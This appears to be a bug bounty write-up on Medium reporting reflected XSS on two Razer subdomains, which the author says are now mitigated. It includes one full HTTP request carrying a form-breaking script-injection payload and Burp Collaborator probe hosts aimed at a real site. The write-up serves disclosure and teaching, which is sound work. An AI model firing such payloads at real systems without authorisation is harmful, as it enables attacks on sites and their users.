2 Reflected XSS In Razer

First Of All thanks for reading my first write up in medium

My Name Is Mostafa I Am Working As information Security Engineer And My Part Time Doing Some Bug Hunting

I Found 2 Vulnerabilities In The Different Subdomains in Razer

The First One is reflected XSS in (http://drivers.razersupport.com)

When I Searching To XSS Looked To Refelected Params I Found CSRF Token Have Been reflected and Commented In HTML Response So This Is The First One I Just Close The Form Tag And Wrote XSS Payload And Has Been Executed

GET /index.php?_m=k2n4qnfei8t8yk2e7ua78c7m7dd41t.burpcollaborator.net&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131&_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131 → →”></form><h1><script>alert(document.domain)</script></h1> HTTP/1.1
Host: drivers.razersupport.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SWIFT_sessionid40=59cpx8mzpt0t559zefhsfxe7eykq8f.burpcollaborator.net; _gcl_au=1.1.291319320.1592845997; __utma=124197257.1459569068.1592845998.1592845998.1592845998.1; __utmc=124197257; __utmz=124197257.1592845998.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; __utmb=124197257.1.10.1592845998; _ga=GA1.2.1459569068.1592845998; _gid=GA1.2.741943482.1592845999; __unam=c0300f2–172dd050e1d-36a23205–2; _dc_gtm_UA-33485401–2=1
Connection: close

The Second Reflected XSS (auth.pay.razer.com)

Good Advice Test all Reflected Inputs and Don’t Use Automation Tools To Find XSS

All Issues Is Mitigated

Thanks

Information Security Engineer And Bug Hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Announcing Flutter beta 1: Build beautiful native apps

How Open-Source Platforms Promote Creativity and Drive Change

Bebe Rexha is being accused of blackfishing after her skin tone seemed to match Doja Cat’s at the…

Another set of common async / Task mistakes, and how to avoid them

Python AI: How to build a simple AI in 4 lines of Python code using CHAIPY

Amplitude of FFT is not correct

Welcome to Susy3!

Laravel-Docker Dev Environment

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mostafa

Mostafa

Information Security Engineer And Bug Hunter

More from Medium

Privilege Escalation Leads to User File Storage leakage on PythonAnywhere.com Web Console

Intigriti’s February XSS challenge By aszx87410

Exploiting CVE-2019–5418- File Content Disclosure on Rails

Hashing the Favicon.ico